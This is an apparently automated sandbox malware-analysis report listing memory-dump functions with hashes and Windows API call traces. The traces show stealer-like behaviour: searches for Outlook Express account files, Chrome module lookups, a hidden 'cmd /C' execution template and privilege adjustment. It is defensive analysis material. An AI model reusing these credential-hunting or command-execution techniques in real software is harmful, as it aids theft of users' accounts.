  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1E86, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 34memorystring
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C47EC, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39 Total matches: 38memory
Similarity
  • Total matches: 38
  • API ID: HeapFreememcpy
  • String ID: ($Client
  • API String ID: 2443564160-90774469
  • Opcode ID: 4c92a37d4490a7167670f7697e6105d9cf60d964df118a6b4f918dcc470b9dca
  • Instruction ID: c1e00d211da7bd7c46413cc8967d8cd207c068dedf10a28f474e265e557727d1
  • Opcode Fuzzy Hash: B4D02B712800C2031407A1815C313FA06B33E026DF89C6721FF64284848DD6DBE42B09
  • Instruction Fuzzy Hash: c1e00d211da7bd7c46413cc8967d8cd207c068dedf10a28f474e265e557727d1
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
  • HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B329FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3464F, Relevance: 6.0, APIs: 4, Instructions: 32 Total matches: 128memorystring
Similarity
  • Total matches: 128
  • API ID: lstrlen$RtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 1738276641-0
  • Opcode ID: aaba7d0a47ca100521561682d36ca88f08b4b9b0e2dd2eccb0d3987922e97ba9
  • Instruction ID: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
  • Opcode Fuzzy Hash: B7C012A4436C87C88CC059470679660D1C55FF6B0001C530BB0542A31D47523AB6758D
  • Instruction Fuzzy Hash: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
APIs
  • lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
  • lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
  • wsprintfW.USER32 ref: 01B3469A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2B66, Relevance: 5.2, APIs: 4, Instructions: 156 Total matches: 79memory
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
